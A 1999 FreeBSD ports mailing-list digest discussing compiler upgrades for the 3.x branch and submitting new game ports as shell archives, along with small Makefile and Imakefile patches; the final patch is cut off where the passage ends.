(root@d60-025.leach.ucdavis.edu [169.237.60.25]) by relay.nuxi.com (8.9.3/8.9.3) with ESMTP id VAA15021; Sun, 28 Nov 1999 21:05:38 -0800 (PST) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id VAA54541; Sun, 28 Nov 1999 21:05:37 -0800 (PST) (envelope-from obrien) Date: Sun, 28 Nov 1999 21:05:37 -0800 From: "David O'Brien" To: Will Andrews Cc: Ade Lovett , freebsd-ports@FreeBSD.org, Bill Fumerola , "Chris D. Faulhaber" Subject: Re: ports/15135: new port: devel/cervisia Message-ID: <19991128210537.A54056@dragon.nuxi.com> Reply-To: obrien@NUXI.com References: <19991128201850.A61560@lovett.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from andrews@TECHNOLOGIST.COM on Sun, Nov 28, 1999 at 09:35:16PM -0500 X-Operating-System: FreeBSD 4.0-CURRENT Organization: The NUXI BSD group X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Nov 28, 1999 at 09:35:16PM -0500, Will Andrews wrote: > frankly, I've wondered why gcc 2.91.66 wasn't MFC'd to 3.x long ago > (David?). After all, it's been in -CURRENT for several months (at the > very least). I guess I'm not so agaist it as I was. I was asked if I thought a MFC for 3.3 was reasonable. I said no. My real concern is that parts of the kernel and userland had to be tweaked when I brought in EGCS. I don't know what those changes were at this point. So it is more effort than just a MFC for the compiler. > the earliest version (that I know of) which supports the newer ANSI ISO C++ > standards. That is, the new standard apparently not supported by the > older gcc. I'm confused why the `egcs' port can't be used in -STABLE. That ports gives you GCC 2.95.2, with many of the FreeBSD specific changes. > Can we not MFC gcc 2.91.66 to RELENG_3 for a future version of 3.x? We are approaching code freeze for 3.4, so there certainly isn't time to MFC for 3.4. My guess is that 3.5 will be the last 3.x released version. So it isn't worth the effort at that point. > > If such a change does happen, it may also be worth considering synchronising > > it with a move to USE_NEWGCC for the GNOME metaport I personally see this as the best approach, and one that doesn't really cause any problems. -- -- David (obrien@NUXI.com) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 21:31:36 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pluto.psn.net (pluto.psn.net [207.211.58.12]) by hub.freebsd.org (Postfix) with ESMTP id 9A8E015435 for ; Sun, 28 Nov 1999 21:31:34 -0800 (PST) (envelope-from will@shadow.blackdawn.com) Received: from 5042-243.008.popsite.net ([209.224.140.243] helo=shadow.blackdawn.com) by pluto.psn.net with esmtp (PSN Internet Service 3.03 #1) id 11sJPL-0002sz-00; Sun, 28 Nov 1999 22:31:29 -0700 Received: (from will@localhost) by shadow.blackdawn.com (8.9.3/8.9.3) id AAA37718; Mon, 29 Nov 1999 00:31:05 -0500 (EST) (envelope-from will) Message-ID: X-Mailer: XFMail 1.3.1 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <19991128210537.A54056@dragon.nuxi.com> Date: Mon, 29 Nov 1999 00:31:05 -0500 (EST) Reply-To: Will Andrews From: Will Andrews To: "David O'Brien" Subject: Re: ports/15135: new port: devel/cervisia Cc: "Chris D. Faulhaber" , Bill Fumerola , freebsd-ports@FreeBSD.org, Ade Lovett Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 29-Nov-99 David O'Brien wrote: > I guess I'm not so agaist it as I was. I was asked if I thought a MFC > for 3.3 was reasonable. I said no. My real concern is that parts of the > kernel and userland had to be tweaked when I brought in EGCS. I don't > know what those changes were at this point. So it is more effort than > just a MFC for the compiler. I agree totally with you on this point. >> the earliest version (that I know of) which supports the newer ANSI ISO C++ >> standards. That is, the new standard apparently not supported by the >> older gcc. > > I'm confused why the `egcs' port can't be used in -STABLE. That ports > gives you GCC 2.95.2, with many of the FreeBSD specific changes. I didn't say it can't be used. See below. >> > If such a change does happen, it may also be worth considering >> > synchronising >> > it with a move to USE_NEWGCC for the GNOME metaport > > I personally see this as the best approach, and one that doesn't really > cause any problems. Right. The problem here is that the KDE and Qt port maintainers seem reluctant to put the switch in the kdelibs11 and qt142 ports so that those ports will be compiled using the newer g++.. required for certain aforementioned apps. I think the sooner, the better. Oh well if people have to recompile their libraries with NEWGCC, right? :-) The reason I asked about MFC'ing egcs 1.1.2 is because it would eliminate the need to have USE_NEWGCC in the ports system. Of course, that is the _only_ reason I asked. And quite frankly, I don't like the idea myself. People, let's move on, upgrade those ports! What more convincing evidence do we need? -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 21:38:45 1999 Delivered-To: freebsd-ports@freebsd.org Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [169.237.7.38]) by hub.freebsd.org (Postfix) with ESMTP id 76CF215493 for ; Sun, 28 Nov 1999 21:38:44 -0800 (PST) (envelope-from obrien@NUXI.com) Received: (from obrien@localhost) by relay.nuxi.com (8.9.3/8.9.3) id VAA15148; Sun, 28 Nov 1999 21:38:41 -0800 (PST) (envelope-from obrien) Date: Sun, 28 Nov 1999 21:38:40 -0800 From: "David O'Brien" To: Will Andrews Cc: "David O'Brien" , "Chris D. Faulhaber" , Bill Fumerola , freebsd-ports@FreeBSD.org, Ade Lovett Subject: Re: ports/15135: new port: devel/cervisia Message-ID: <19991128213840.J1371@relay.nuxi.com> Reply-To: obrien@NUXI.com References: <19991128210537.A54056@dragon.nuxi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre1i In-Reply-To: X-Operating-System: FreeBSD 3.3-STABLE Organization: The NUXI BSD group X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Nov 29, 1999 at 12:31:05AM -0500, Will Andrews wrote: > Right. The problem here is that the KDE and Qt port maintainers seem reluctant > to put the switch in the kdelibs11 and qt142 ports so that those ports will be > compiled using the newer g++.. required for certain aforementioned apps. > > I think the sooner, the better. Oh well if people have to recompile their > libraries with NEWGCC, right? :-) I agree. > The reason I asked about MFC'ing egcs 1.1.2 is because it would eliminate the > need to have USE_NEWGCC in the ports system. Yes. But of course that would require everyone to recompile their libs as much as useing NEWGCC would. :) -- -- David (obrien@NUXI.com) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 21:40: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C062215495 for ; Sun, 28 Nov 1999 21:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA00533; Sun, 28 Nov 1999 21:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pluto.psn.net (pluto.psn.net [207.211.58.12]) by hub.freebsd.org (Postfix) with ESMTP id 23A4715493 for ; Sun, 28 Nov 1999 21:38:27 -0800 (PST) (envelope-from will@shadow.blackdawn.com) Received: from 5042-243.008.popsite.net ([209.224.140.243] helo=shadow.blackdawn.com) by pluto.psn.net with esmtp (PSN Internet Service 3.03 #1) for FreeBSD-gnats-submit@FreeBSD.ORG id 11sJW5-00035H-00; Sun, 28 Nov 1999 22:38:26 -0700 Received: (from will@localhost) by shadow.blackdawn.com (8.9.3/8.9.3) id AAA38519; Mon, 29 Nov 1999 00:38:22 -0500 (EST) (envelope-from will) Message-Id: <199911290538.AAA38519@shadow.blackdawn.com> Date: Mon, 29 Nov 1999 00:38:22 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15159: new port: games/blackpenguin Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15159 >Category: ports >Synopsis: new port: games/blackpenguin >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 21:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #2: Tue Nov 16 05:42:45 EST 1999 will@:/usr/src/sys/compile/ARGON i386 FreeBSD shadow.blackdawn.com 3.3-STABLE FreeBSD 3.3-STABLE #0: Sun Nov 14 00:08:42 EST 1999 root@shadow.blackdawn.com:/usr/src/sys/compile/SHADOW i386 >Description: Blackpenguin - neat game. That's all I have to say about this. Read pkg/DESCR. This program compiles fine under 4.0-CURRENT, but for some reason, it fails to compile under 3.3-STABLE: ===> Building for blackpenguin-0.2 g++ -c -pipe -Wall -W -O2 -fno-strength-reduce -I/usr/X11R6/include/X11/qt -o main.o main.cpp g++ -c -pipe -Wall -W -O2 -fno-strength-reduce -I/usr/X11R6/include/X11/qt -o appwindow.o appwindow.cpp appwindow.cpp: In method `ApplicationWindow::ApplicationWindow()': appwindow.cpp:51: conversion from `char **' to non-scalar type `QPixmap' requested appwindow.cpp:52: conversion from `char **' to non-scalar type `QPixmap' requested appwindow.cpp:53: conversion from `char **' to non-scalar type `QPixmap' requested appwindow.cpp:54: conversion from `char **' to non-scalar type `QPixmap' requested appwindow.cpp:55: conversion from `char **' to non-scalar type `QPixmap' requested *** Error code 1 Yes, this is using Qt 1.42 and kdelibs 1.1 compiled under gcc 2.95.2. This problem is not only because of the faulty assumption that GMAKE reads /usr/bin/env environment variables. When I force it to use g++295 under -STABLE, it gives the exact same above error. Any ideas? g++295 should work if g++ 2.91.66 (on -CURRENT) works. >How-To-Repeat: Use the shar below to import the new port to the tree. Perhaps a little feedback regarding -STABLE breakage would be good, first. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # blackpenguin # blackpenguin/files # blackpenguin/files/md5 # blackpenguin/pkg # blackpenguin/pkg/COMMENT # blackpenguin/pkg/DESCR # blackpenguin/pkg/PLIST # blackpenguin/patches # blackpenguin/patches/patch-aa # blackpenguin/Makefile # echo c - blackpenguin mkdir -p blackpenguin > /dev/null 2>&1 echo c - blackpenguin/files mkdir -p blackpenguin/files > /dev/null 2>&1 echo x - blackpenguin/files/md5 sed 's/^X//' >blackpenguin/files/md5 << 'END-of-blackpenguin/files/md5' XMD5 (blackpenguin-0.2.tar.gz) = 91ac8ac0f5588122c469e3f65b98c3df END-of-blackpenguin/files/md5 echo c - blackpenguin/pkg mkdir -p blackpenguin/pkg > /dev/null 2>&1 echo x - blackpenguin/pkg/COMMENT sed 's/^X//' >blackpenguin/pkg/COMMENT << 'END-of-blackpenguin/pkg/COMMENT' XThis arcade-style game, while rather Linux-oriented, is addicting Xand reminds me of an old game I used to play on my old 486.. what Xgame was that? Somebody remind me. X XAnyway, this game is a LOT of fun and has been well-programmed, Xand it seems rather complete. X XWWW: http://www.priebs.de/blackpenguin.html XAuthor: pengu@pribs.de END-of-blackpenguin/pkg/COMMENT echo x - blackpenguin/pkg/DESCR sed 's/^X//' >blackpenguin/pkg/DESCR << 'END-of-blackpenguin/pkg/DESCR' XArcade style jump-on-cubes game. END-of-blackpenguin/pkg/DESCR echo x - blackpenguin/pkg/PLIST sed 's/^X//' >blackpenguin/pkg/PLIST << 'END-of-blackpenguin/pkg/PLIST' Xbin/blackpenguin Xshare/blackpenguin/README END-of-blackpenguin/pkg/PLIST echo c - blackpenguin/patches mkdir -p blackpenguin/patches > /dev/null 2>&1 echo x - blackpenguin/patches/patch-aa sed 's/^X//' >blackpenguin/patches/patch-aa << 'END-of-blackpenguin/patches/patch-aa' X--- Makefile Tue Nov 23 12:50:14 1999 X+++ Makefile.new Sun Nov 28 23:49:14 1999 X@@ -11,7 +11,7 @@ X CXX = g++ X CFLAGS = -pipe -Wall -W -O2 -fno-strength-reduce X CXXFLAGS= -pipe -Wall -W -O2 -fno-strength-reduce X-INCPATH = -I$(QTDIR)/include X+INCPATH = -I$(QTDIR)/include/X11/qt X LINK = g++ X LFLAGS = X LIBS = -L$(QTDIR)/lib -lqt -L/usr/X11R6/lib -lX11 -lXext END-of-blackpenguin/patches/patch-aa echo x - blackpenguin/Makefile sed 's/^X//' >blackpenguin/Makefile << 'END-of-blackpenguin/Makefile' X# New ports collection makefile for: blackpenguin X# Version required: 0.2 X# Date created: 19 Nov 1999 X# Whom: Will Andrews X# X# $FreeBSD$ X# X XDISTNAME= blackpenguin-0.2 XCATEGORIES= games XMASTER_SITES= ${MASTER_SITE_SUNSITE} XMASTER_SITE_SUBDIR= games/arcade X XMAINTAINER= andrews@technologist.com X XLIB_DEPENDS= kdeui.2:${PORTSDIR}/x11/kdelibs11 X XUSE_QT= yes XUSE_X_PREFIX= yes XMAKE_ENV= QTDIR=${PREFIX} X XWRKSRC= ${WRKDIR}/${DISTNAME}/src X Xdo-install: X.if !defined(NOPORTDOCS) X @${MKDIR} ${PREFIX}/share/blackpenguin X @${INSTALL_DATA} ${WRKDIR}/${DISTNAME}/doc/README ${PREFIX}/share/blackpenguin X @${ECHO} X @${ECHO} "Docs are installed in ${PREFIX}/share/blackpenguin/." X @${ECHO} X.endif X @${INSTALL_PROGRAM} ${WRKSRC}/blackpenguin ${PREFIX}/bin X X.include END-of-blackpenguin/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 21:44:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9CA351549D; Sun, 28 Nov 1999 21:44:16 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA01035; Sun, 28 Nov 1999 21:44:16 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sun, 28 Nov 1999 21:44:16 -0800 (PST) From: Message-Id: <199911290544.VAA01035@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, green@FreeBSD.org Subject: Re: ports/15158: [PATCH] PAM module for authenticating via SSH passphrase Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] PAM module for authenticating via SSH passphrase Responsible-Changed-From-To: freebsd-ports->green Responsible-Changed-By: cpiazza Responsible-Changed-When: Sun Nov 28 21:44:08 PST 1999 Responsible-Changed-Why: Over to maintainer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 22: 0: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4983215412 for ; Sun, 28 Nov 1999 22:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA02139; Sun, 28 Nov 1999 22:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 28 Nov 1999 22:00:02 -0800 (PST) Message-Id: <199911290600.WAA02139@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Will Andrews Subject: RE: ports/15159: new port: games/blackpenguin Reply-To: Will Andrews Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15159; it has been noted by GNATS. From: Will Andrews To: Will Andrews Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: RE: ports/15159: new port: games/blackpenguin Date: Mon, 29 Nov 1999 00:56:43 -0500 (EST) On 29-Nov-99 Will Andrews wrote: > sed 's/^X//' >blackpenguin/pkg/COMMENT << 'END-of-blackpenguin/pkg/COMMENT' > XThis arcade-style game, while rather Linux-oriented, is addicting > Xand reminds me of an old game I used to play on my old 486.. what > Xgame was that? Somebody remind me. > X > XAnyway, this game is a LOT of fun and has been well-programmed, > Xand it seems rather complete. > X > XWWW: http://www.priebs.de/blackpenguin.html > XAuthor: pengu@pribs.de > END-of-blackpenguin/pkg/COMMENT > echo x - blackpenguin/pkg/DESCR > sed 's/^X//' >blackpenguin/pkg/DESCR << 'END-of-blackpenguin/pkg/DESCR' > XArcade style jump-on-cubes game. > END-of-blackpenguin/pkg/DESCR OK, THAT'S IT Will! NO MORE PORTING TONIGHT! My apologies, I didn't use portlint this time and ended up switching pkg/DESCR and pkg/COMMENT as you see here. :\ I also didn't include my traditional.. "-- Will " ..at the end. :-\ *spank* -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 22:30: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 06CE6153DD for ; Sun, 28 Nov 1999 22:30:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA04464; Sun, 28 Nov 1999 22:30:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pluto.psn.net (pluto.psn.net [207.211.58.12]) by hub.freebsd.org (Postfix) with ESMTP id 079A615072 for ; Sun, 28 Nov 1999 22:26:08 -0800 (PST) (envelope-from will@shadow.blackdawn.com) Received: from 5042-243.008.popsite.net ([209.224.140.243] helo=shadow.blackdawn.com) by pluto.psn.net with esmtp (PSN Internet Service 3.03 #1) for FreeBSD-gnats-submit@FreeBSD.ORG id 11sKGF-0004Wx-00; Sun, 28 Nov 1999 23:26:07 -0700 Received: (from will@localhost) by shadow.blackdawn.com (8.9.3/8.9.3) id BAA45052; Mon, 29 Nov 1999 01:26:04 -0500 (EST) (envelope-from will) Message-Id: <199911290626.BAA45052@shadow.blackdawn.com> Date: Mon, 29 Nov 1999 01:26:04 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15160: new port: games/ksnes9x Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15160 >Category: ports >Synopsis: new port: games/ksnes9x >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 22:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #2: Tue Nov 16 05:42:45 EST 1999 will@:/usr/src/sys/compile/ARGON i386 FreeBSD shadow.blackdawn.com 3.3-STABLE FreeBSD 3.3-STABLE #0: Sun Nov 14 00:08:42 EST 1999 root@shadow.blackdawn.com:/usr/src/sys/compile/SHADOW i386 >Description: KSNES9X is a neat KDE wrapper for the snes9x program. However, whether or not it actually works, I don't know. I do know it compiles, links, and runs fine under -CURRENT and -STABLE. Caveat emptor: I am certain that it requires kdelibs compiled using NEWGCC, and thus it is _currently_ broken under -STABLE. And NEWGCC for Qt 1.42, almost as certain. >How-To-Repeat: Use the shar below to import the new port to the tree. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # ksnes9x # ksnes9x/files # ksnes9x/files/md5 # ksnes9x/pkg # ksnes9x/pkg/PLIST # ksnes9x/pkg/DESCR # ksnes9x/pkg/COMMENT # ksnes9x/Makefile # echo c - ksnes9x mkdir -p ksnes9x > /dev/null 2>&1 echo c - ksnes9x/files mkdir -p ksnes9x/files > /dev/null 2>&1 echo x - ksnes9x/files/md5 sed 's/^X//' >ksnes9x/files/md5 << 'END-of-ksnes9x/files/md5' XMD5 (ksnes9x-1.1.tar.gz) = f93a6dfcea3b7d58702cbbf62408397f END-of-ksnes9x/files/md5 echo c - ksnes9x/pkg mkdir -p ksnes9x/pkg > /dev/null 2>&1 echo x - ksnes9x/pkg/PLIST sed 's/^X//' >ksnes9x/pkg/PLIST << 'END-of-ksnes9x/pkg/PLIST' Xbin/ksnes9x Xshare/applnk/Applications/ksnes9x.kdelnk Xshare/icons/ksnes9x.xpm Xshare/icons/mini/ksnes9x.xpm Xshare/doc/HTML/en/ksnes9x/index.html Xshare/doc/HTML/en/ksnes9x/index-1.html Xshare/doc/HTML/en/ksnes9x/index-2.html Xshare/doc/HTML/en/ksnes9x/index-3.html Xshare/doc/HTML/en/ksnes9x/index-4.html Xshare/doc/HTML/en/ksnes9x/index-5.html Xshare/doc/HTML/en/ksnes9x/index-6.html Xshare/toolbar/open.xpm X@dirrm share/doc/HTML/en/ksnes9x END-of-ksnes9x/pkg/PLIST echo x - ksnes9x/pkg/DESCR sed 's/^X//' >ksnes9x/pkg/DESCR << 'END-of-ksnes9x/pkg/DESCR' XKSNES9X is a neat KDE wrapper for the snes9x emulator under FreeBSD. XIt allows people to launch SNES ROMs using snes9x as the engine, with Xa "friendly environment". X XWWW: http://www.esquadro.com.br/~ismore/ XAuthor: Ismael Orenstein X X- Will END-of-ksnes9x/pkg/DESCR echo x - ksnes9x/pkg/COMMENT sed 's/^X//' >ksnes9x/pkg/COMMENT << 'END-of-ksnes9x/pkg/COMMENT' XSNES9X wrapper for KDE. END-of-ksnes9x/pkg/COMMENT echo x - ksnes9x/Makefile sed 's/^X//' >ksnes9x/Makefile << 'END-of-ksnes9x/Makefile' X# New ports collection makefile for: KSnes9x X# Version required: 1.1 X# Date created: 12 Nov 1999 X# Whom: Will Andrews X# X# $FreeBSD$ X# X XDISTNAME= ksnes9x-1.1 XCATEGORIES= games XMASTER_SITES= http://www.esquadro.com.br/~ismore/ X XMAINTAINER= andrews@technologist.com X XLIB_DEPENDS= kdeui.2:${PORTSDIR}/x11/kdelibs11 X XRUN_DEPENDS= snes9x:${PORTSDIR}/emulators/snes9x X XGNU_CONFIGURE= yes XCONFIGURE_ARGS= --prefix=${LOCALBASE} XUSE_NEWGCC= yes XUSE_GMAKE= yes XUSE_QT= yes X X.include END-of-ksnes9x/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 22:59:55 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DBEBA15343; Sun, 28 Nov 1999 22:59:54 -0800 (PST) (envelope-from sumikawa@FreeBSD.org) Received: (from sumikawa@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA12643; Sun, 28 Nov 1999 22:59:54 -0800 (PST) (envelope-from sumikawa@FreeBSD.org) Date: Sun, 28 Nov 1999 22:59:54 -0800 (PST) From: Message-Id: <199911290659.WAA12643@freefall.freebsd.org> To: watanabe@zlab.phys.nagoya-u.ac.jp, sumikawa@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15149: Delete interactive feature of ja-dvipsk-* ports Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Delete interactive feature of ja-dvipsk-* ports State-Changed-From-To: open->closed State-Changed-By: sumikawa State-Changed-When: Mon Nov 29 15:59:26 JST 1999 State-Changed-Why: commited, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 2:10: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2D2F815019 for ; Mon, 29 Nov 1999 02:10:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA30465; Mon, 29 Nov 1999 02:10:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from tricord.system.pl (tricord.system.pl [195.205.185.10]) by hub.freebsd.org (Postfix) with ESMTP id 4509814ED7 for ; Mon, 29 Nov 1999 02:05:22 -0800 (PST) (envelope-from saper@saperski.system.pl) Received: from saperski.system.pl (saperski.system.pl [195.205.185.24]) by tricord.system.pl (SYSTEM Internet) with ESMTP id LAA18987 for ; Mon, 29 Nov 1999 11:05:17 +0100 (MET) Received: (from saper@localhost) by saperski.system.pl (8.9.3/8.9.3) id LAA78615; Mon, 29 Nov 1999 11:06:32 +0100 (CET) (envelope-from saper) Message-Id: <199911291006.LAA78615@saperski.system.pl> Date: Mon, 29 Nov 1999 11:06:32 +0100 (CET) From: saper@system.pl To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15161: Add pnmtopng run-time dependency to a tgif-4.1.25 port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15161 >Category: ports >Synopsis: Add pnmtopng run-time dependency to a tgif-4.1.25 port >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 02:10:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: Marcin Cie¶lak >Release: FreeBSD 3.2-RELEASE i386 >Organization: SYSTEM Internet Provider >Environment: Current ports tree as of Pon 29 Lis 11:04:24 1999 CET >Description: tgif -print -png option doesn't work without pnmtopng utility, which is available as a separate package and not in netpbm. >How-To-Repeat: Try to print your image to a PNG format without pnmtopng installed. You get: >Fix: --- graphics/tgif/Makefile.orig Mon Nov 29 10:28:33 1999 +++ graphics/tgif/Makefile Mon Nov 29 10:52:35 1999 @@ -13,7 +13,8 @@ MAINTAINER= bmc@WillsCreek.COM -RUN_DEPENDS= giftopnm:${PORTSDIR}/graphics/netpbm +RUN_DEPENDS= giftopnm:${PORTSDIR}/graphics/netpbm \ + pnmtopng:${PORTSDIR}/graphics/pnmtopng USE_IMAKE= yes MAN1= tgif.1 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 5:12:19 1999 Delivered-To: freebsd-ports@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 9AE8914A20 for ; Mon, 29 Nov 1999 05:12:13 -0800 (PST) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id OAA95163; Mon, 29 Nov 1999 14:12:10 +0100 (CET) (envelope-from des) To: Julian Elischer Cc: ports@freebsd.org Subject: Re: Threads diagrams References: From: Dag-Erling Smorgrav Date: 29 Nov 1999 14:12:09 +0100 In-Reply-To: Julian Elischer's message of "Fri, 26 Nov 1999 14:47:13 -0800 (PST)" Message-ID: Lines: 74 User-Agent: Gnus/5.070097 (Pterodactyl Gnus v0.97) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Julian Elischer writes: > (gee I find xfig unintuitive.. xfig is fine once you get used to it, but the port maintainer has for some unknown reason chosen to optimize the port for very small displays. Attached is a replacement for graphics/xfig/patches/patch-aa which should make xfig more usable on real-world displays; I've removed the hunk that selected scaled-down toolbar icons instead of the default large ones, and added defines which allow the horizontal and vertical rulers to grow to 1600 and 1200 pixels, respectively. BTW, our xfig port is still at version 3.2 patchlevel 2. The newest version is 3.2 patchlevel 2c, though it doesn't seem to be available from the usual MASTER_SITE_XCONTRIB sites. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no --- Imakefile.orig Thu Jul 2 19:37:09 1998 +++ Imakefile Mon Aug 2 10:27:43 1999 @@ -54,7 +54,7 @@ XCOMM Uncomment the following definition for XAWLIB if you want to use XCOMM the 3d Athena Widget Set (highly recommended!) -XCOMM XAWLIB = -lXaw3d +XAWLIB = -lXaw3d XCOMM Uncomment the following if needed for DECstations running older X11R4 XCOMM INCROOT=/usr/include/mit @@ 